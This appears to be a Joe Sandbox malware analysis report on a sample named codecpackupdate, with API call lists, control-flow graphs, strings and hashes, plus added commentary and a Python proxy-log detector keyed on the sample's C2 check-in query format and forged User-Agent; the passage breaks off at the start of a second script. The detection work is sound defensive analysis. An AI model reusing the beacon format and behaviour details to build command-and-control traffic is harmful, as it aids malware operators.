9fd04a 444->450 454 9f7aab-9f7aac 450->454 454->415 460 9f76e8-9f7713 Sleep call a01830 459->460 461 9f76e3 call 9f380b 459->461 465 9f771f-9f772d 460->465 466 9f7715-9f771e call 9f4100 460->466 461->460 465->417 468 9f772f call 9f380b 465->468 466->465 468->417
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(00A271B8), ref: 009F64B6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009F64CD
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64D6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009F64E5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64E8
                                                                          • GetTickCount.KERNEL32 ref: 009F64F4
                                                                            • Part of subcall function 009F605A: _malloc.LIBCMT ref: 009F6068
                                                                          • GetVersionExA.KERNEL32(00A27010), ref: 009F6521
                                                                          • _malloc.LIBCMT ref: 009F654D
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • _malloc.LIBCMT ref: 009F655D
                                                                          • _malloc.LIBCMT ref: 009F6568
                                                                          • _malloc.LIBCMT ref: 009F6573
                                                                          • _malloc.LIBCMT ref: 009F657E
                                                                          • _malloc.LIBCMT ref: 009F6589
                                                                          • _malloc.LIBCMT ref: 009F6594
                                                                          • _malloc.LIBCMT ref: 009F65A3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009F65BA
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65C3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65D2
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65D5
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65E0
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65E3
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F661D
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F662A
                                                                          • _malloc.LIBCMT ref: 009F664E
                                                                          • _malloc.LIBCMT ref: 009F665C
                                                                          • _malloc.LIBCMT ref: 009F6663
                                                                          • _malloc.LIBCMT ref: 009F6689
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 009F669C
                                                                          • Sleep.KERNELBASE ref: 009F66AA
                                                                          • _malloc.LIBCMT ref: 009F66B6
                                                                          • _malloc.LIBCMT ref: 009F66C3
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                          • API String ID: 4273019447-2678694477
                                                                          • Opcode ID: ddca006462ebe0f128f29a403cd4e0eac2e1a7cd97cc4520bf1db61343356e25
                                                                          • Instruction ID: cd4c20e3151918897be6887de5d181d4586298108d8a841adfa167c46d398f2b
                                                                          • Opcode Fuzzy Hash: ddca006462ebe0f128f29a403cd4e0eac2e1a7cd97cc4520bf1db61343356e25
                                                                          • Instruction Fuzzy Hash: 4171C4B1948354AFE710EF74EC0AB6F7BE8BF49710F10482AF68497291DBB45901CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
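Two strings in this initialisation routine are the most durable network indicators the report exposes: the sprintf format of the check-in query, cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, and the hard-coded User-Agent Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), which claims a Windows version that does not exist. The detection below is an added example, not code from the report or the sample: it derives one validator per query key from the format specifiers, scores each request in a constructed tab-separated proxy log (timestamp, source IP, method, URL, User-Agent; the hostnames and addresses are made up), and weights the full nine-key match far above the User-Agent, since the latter is trivially changed between builds. The 50-point alert threshold is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Hard-coded User-Agent from the string list above. "Windows NT 9.0" is not a
# version Windows has ever reported, which makes it a usable indicator by itself.
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# One validator per key of the beacon format string from the report:
# cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d
DEC = re.compile(r"^-?\d+$")
HEX = re.compile(r"^[0-9a-f]+$")
BEACON_FIELDS = {
    "cid": re.compile(r"^[0-9a-f]{8,}$"),     # %.8x: at least 8 lowercase hex digits
    "connected": DEC,
    "sport": DEC,
    "high_port": HEX,
    "low_port": HEX,
    "stream": DEC,
    "os": re.compile(r"^\d+\.\d+\.\d{4,}$"),  # %d.%d.%04d: e.g. 10.0.19045
    "dgt": DEC,
    "dti": DEC,
}

# Constructed sample log (not real traffic): timestamp, src IP, method, URL, User-Agent.
SAMPLE_LOG = """\
2024-03-28T10:00:01Z\t10.0.0.5\tGET\thttp://c2.example.invalid/api.php?cid=1a2b3c4d&connected=1&sport=38712&high_port=ffff&low_port=c000&stream=0&os=10.0.19045&dgt=0&dti=0\tMozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
2024-03-28T10:00:02Z\t10.0.0.7\tGET\thttp://www.example.invalid/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
2024-03-28T10:00:03Z\t10.0.0.9\tGET\thttp://cdn.example.invalid/track?cid=abc&stream=1\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
"""


def score_request(url, user_agent):
    """Score one request against the beacon indicators; returns (score, reasons)."""
    score, reasons = 0, []
    query = urlsplit(url).query
    qs = parse_qs(query, keep_blank_values=True)
    matched = [k for k, rx in BEACON_FIELDS.items() if k in qs and rx.match(qs[k][0])]
    order = [p.split("=", 1)[0] for p in query.split("&") if p]
    if len(matched) == len(BEACON_FIELDS):
        if order == list(BEACON_FIELDS):
            score += 80
            reasons.append("all 9 beacon fields present, in the sprintf order")
        else:
            score += 60
            reasons.append("all 9 beacon fields present")
    elif len(matched) >= 5:
        score += 30
        reasons.append(f"{len(matched)}/9 beacon fields present")
    if user_agent == BEACON_UA:
        score += 30
        reasons.append("exact hard-coded User-Agent")
    elif "Windows NT 9.0" in user_agent:
        score += 15
        reasons.append("User-Agent claims Windows NT 9.0")
    return score, reasons


def scan_log(text, threshold=50):
    """Return [(timestamp, src_ip, score, reasons)] for lines scoring >= threshold."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _method, url, ua = line.split("\t", 4)
        score, reasons = score_request(url, ua)
        if score >= threshold:
            hits.append((ts, src, score, reasons))
    return hits


if __name__ == "__main__":
    for ts, src, score, reasons in scan_log(SAMPLE_LOG):
        print(ts, src, score, "; ".join(reasons))
```

The query-key check is the part worth keeping when porting this to a proxy or IDS rule: the nine field names together with their numeric formats are specific enough that an ordered match alone justifies an alert, whereas the User-Agent string on its own should only raise the score, because the same loop could be rebuilt with any other header.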

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 840 401b4b-401b68 LoadLibraryA 841 401c21-401c25 840->841 842 401b6e-401b7f GetProcAddress 840->842 843 401b85-401b8e 842->843 844 401c18-401c1b FreeLibrary 842->844 845 401b95-401ba5 GetAdaptersInfo 843->845 844->841 846 401ba7-401bb0 845->846 847 401bdb-401be3 845->847 850 401bc1-401bd7 call 402cd0 call 4018cc 846->850 851 401bb2-401bb6 846->851 848 401be5-401beb call 402cb6 847->848 849 401bec-401bf0 847->849 848->849 853 401bf2-401bf6 849->853 854 401c15-401c17 849->854 850->847 851->847 855 401bb8-401bbf 851->855 853->854 858 401bf8-401bfb 853->858 854->844 855->850 855->851 860 401c06-401c13 call 402ca8 858->860 861 401bfd-401c03 858->861 860->845 860->854 861->860
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 914 9ff8da-9ff8fd LoadLibraryA 915 9ff9bd-9ff9c4 914->915 916 9ff903-9ff911 GetProcAddress 914->916 917 9ff917-9ff927 916->917 918 9ff9b6-9ff9b7 FreeLibrary 916->918 919 9ff929-9ff935 GetAdaptersInfo 917->919 918->915 920 9ff96d-9ff975 919->920 921 9ff937 919->921 923 9ff97e-9ff983 920->923 924 9ff977-9ff97d call a036eb 920->924 922 9ff939-9ff940 921->922 925 9ff94a-9ff952 922->925 926 9ff942-9ff946 922->926 928 9ff985-9ff988 923->928 929 9ff9b1-9ff9b5 923->929 924->923 931 9ff955-9ff95a 925->931 926->922 930 9ff948 926->930 928->929 933 9ff98a-9ff98f 928->933 929->918 930->920 931->931 934 9ff95c-9ff969 call 9ff629 931->934 935 9ff99c-9ff9a7 call a03a8f 933->935 936 9ff991-9ff999 933->936 934->920 935->929 941 9ff9a9-9ff9ac 935->941 936->935 941->919
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 009FF8F0
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 009FF909
                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 009FF92E
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 009FF9B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 20ab673fc821e9e4abc281dfbeae330ba7c6fb7646fd2a670dda12bbdfea00f3
                                                                          • Instruction ID: 11384d2eb0220f48c1701c7a3c9429a1f299627554a578c1d0dc0dee28f6db0a
                                                                          • Opcode Fuzzy Hash: 20ab673fc821e9e4abc281dfbeae330ba7c6fb7646fd2a670dda12bbdfea00f3
                                                                          • Instruction Fuzzy Hash: EE219475A0420DABDB14DFA8D8A47FEBBBCAF05350F1440BAE644E7241D7749E85C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: function at 9ff7d6 (graph rendering not reproduced; node list and executed / not executed colouring omitted)
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 009FF7F5
                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 009FF833
                                                                          • GetLastError.KERNEL32 ref: 009FF894
                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 009FF8CB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 3786717961-1180397377
                                                                          • Opcode ID: 05f4b2a3e477b3765b9e3bb5654f9c73c1eef353627396a6b5fad5f49a997fc7
                                                                          • Instruction ID: 0cb86fdf902d3299a3073ef839a941e89d88d4e974ca0a20c42069af3d310c0b
                                                                          • Opcode Fuzzy Hash: 05f4b2a3e477b3765b9e3bb5654f9c73c1eef353627396a6b5fad5f49a997fc7
                                                                          • Instruction Fuzzy Hash: 56319E72D00219ABDB14DF95D8A4AFEBBB8FF09790F20417AE606A7290D7705E05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: function at 401a4f (graph rendering not reproduced; node list and executed / not executed colouring omitted)
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 3786717961-1180397377
                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: function at 9f642a (graph rendering not reproduced; node list and executed / not executed colouring omitted)
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009F64CD
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64D6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009F64E5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64E8
                                                                          • GetTickCount.KERNEL32 ref: 009F64F4
                                                                          • GetVersionExA.KERNEL32(00A27010), ref: 009F6521
                                                                          • _malloc.LIBCMT ref: 009F654D
                                                                          • _malloc.LIBCMT ref: 009F655D
                                                                          • _malloc.LIBCMT ref: 009F6568
                                                                          • _malloc.LIBCMT ref: 009F6573
                                                                          • _malloc.LIBCMT ref: 009F657E
                                                                          • _malloc.LIBCMT ref: 009F6589
                                                                          • _malloc.LIBCMT ref: 009F6594
                                                                          • _malloc.LIBCMT ref: 009F65A3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009F65BA
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65C3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65D2
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65D5
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65E0
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65E3
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F661D
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F662A
                                                                          • _malloc.LIBCMT ref: 009F664E
                                                                          • _malloc.LIBCMT ref: 009F665C
                                                                          • _malloc.LIBCMT ref: 009F6663
                                                                          • _malloc.LIBCMT ref: 009F6689
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 009F669C
                                                                          • Sleep.KERNELBASE ref: 009F66AA
                                                                          • _malloc.LIBCMT ref: 009F66B6
                                                                          • _malloc.LIBCMT ref: 009F66C3
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$AllocateProcess$AddressEnterHandleLeaveModuleProcSleep$CountCounterPerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                          • API String ID: 2110165542-2678694477
                                                                          • Opcode ID: 96aceb53da585eef51812b98a703e46c32994701699364844a33a1dfed61f96c
                                                                          • Instruction ID: f9a5a549bdb01f5b82df8f2d9b5472552660d8bbe31cef3c1c334c49b0c77952
                                                                          • Opcode Fuzzy Hash: 96aceb53da585eef51812b98a703e46c32994701699364844a33a1dfed61f96c
                                                                          • Instruction Fuzzy Hash: 3C8109B19483549FD310AF74EC09BAFBFE8AF89314F20482EF68497291DB754801CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009F1D11
                                                                          • GetLastError.KERNEL32 ref: 009F1D23
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009F1D59
                                                                          • GetLastError.KERNEL32 ref: 009F1D6B
                                                                          • __beginthreadex.LIBCMT ref: 009F1DB1
                                                                          • GetLastError.KERNEL32 ref: 009F1DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F1DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F1DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009F1E14
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009F1E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 4246062733-3017686385
                                                                          • Opcode ID: ab20c3456c70afcd28ec7c2871ae939dd2cdf691162a2ffe6771a84a600e10b8
                                                                          • Instruction ID: 6095631900d956a76673b94916a06f0cf5a9a65457909418e8f52119532724b4
                                                                          • Opcode Fuzzy Hash: ab20c3456c70afcd28ec7c2871ae939dd2cdf691162a2ffe6771a84a600e10b8
                                                                          • Instruction Fuzzy Hash: C1317C71A043059FD700EF60C848B6FBBB9EB88751F10856DF9599B2A1DB309D4ACBD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4D8B
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4DB7
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4DC3
                                                                            • Part of subcall function 009F4BED: __EH_prolog.LIBCMT ref: 009F4BF2
                                                                            • Part of subcall function 009F4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 009F4CF2
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4E93
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4E99
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F4EA0
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F4EA6
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F50A7
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F50AD
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F50B8
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F50C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: ad33e4642f09c3778f35b575ad4b988f006ce0969f9c2d2c8f35f6ed25b26672
                                                                          • Instruction ID: 691e9199e7aebec7e11f05158cc7c229c44f8a3b1c57fe52a105c6bac33486bc
                                                                          • Opcode Fuzzy Hash: ad33e4642f09c3778f35b575ad4b988f006ce0969f9c2d2c8f35f6ed25b26672
                                                                          • Instruction Fuzzy Hash: 90B17B71D0425DDFDF21DFA0C841BEEBBB9AF44314F14805AEA09B6281DB745A49CFA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph: function at 401f64 (graph rendering not reproduced; node list and executed / not executed colouring omitted)
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                          • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered image omitted): function 009F26DB-009F27F0; entry block 9f26db-9f2726 (RtlEnterCriticalSection), timer setup in 9f2728-9f2736 (CreateWaitableTimerA) and 9f275b-9f2778 (SetWaitableTimer), exit block 9f27d5-9f27f0 (RtlLeaveCriticalSection).
                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F2706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009F272B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A15A93), ref: 009F2738
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009F2778
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F27D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: e3f0859a34ea27fc398250d1a43331681fe327d99367ff4315a908700cf661a2
                                                                          • Instruction ID: b84edb636d977e918257c67f9abb38d412c366f8bc9ac9996a44153925322b0b
                                                                          • Opcode Fuzzy Hash: e3f0859a34ea27fc398250d1a43331681fe327d99367ff4315a908700cf661a2
                                                                          • Instruction Fuzzy Hash: 7A31A1B1508709EFD310EF65D945B6ABBECFB48765F004A2EF95587680D770E900CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (rendered image omitted): function 009F2B95-009F2D38; entry block 9f2b95-9f2baf, receive block 9f2be2-9f2c11 (WSASetLastError, WSARecv), wait block 9f2cbc-9f2cfa (WSASetLastError, select), exit block 9f2d32-9f2d38; block 9f2d19-9f2d1d branches back to the receive block.
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F2BE4
                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 009F2C07
                                                                            • Part of subcall function 009FA43C: WSAGetLastError.WS2_32(00000000,?,?,009F2A51), ref: 009FA44A
                                                                          • WSASetLastError.WS2_32 ref: 009F2CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 009F2CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3'
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: 81cc69d929e7974da876504aa965c954cde680f31e61c0ca81c8f7460cae373e
                                                                          • Instruction ID: 422558ee40ee65e4d103b3d69a44dd8ee41d9b89e20ffd21da74d6a95f9247e7
                                                                          • Opcode Fuzzy Hash: 81cc69d929e7974da876504aa965c954cde680f31e61c0ca81c8f7460cae373e
                                                                          • Instruction Fuzzy Hash: 51417AB1A083098FD710DF64D505BBBBBE8BF84355F20491EFA99C7291EB74D8418B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

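The `control_flow_graph` text that Joe Sandbox exports under each Control-flow Graph heading is a flat token stream: a decimal node id followed by an address range opens a basic block, bare words such as `WSARecv` or `call 9fa43c` label the open block, and `src->dst` tokens are edges. The Python below is an added example, not part of this report or of the Joe Sandbox tooling; it parses that stream for the WSARecv/select function at 009F2B95 (the sample string is copied from the report's export) and runs a depth-first search to find loop back-edges, which is how one confirms from the dump alone that this function is a receive/retry loop headed by the WSARecv block at 9f2be2. The token grammar is inferred from the dump and is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

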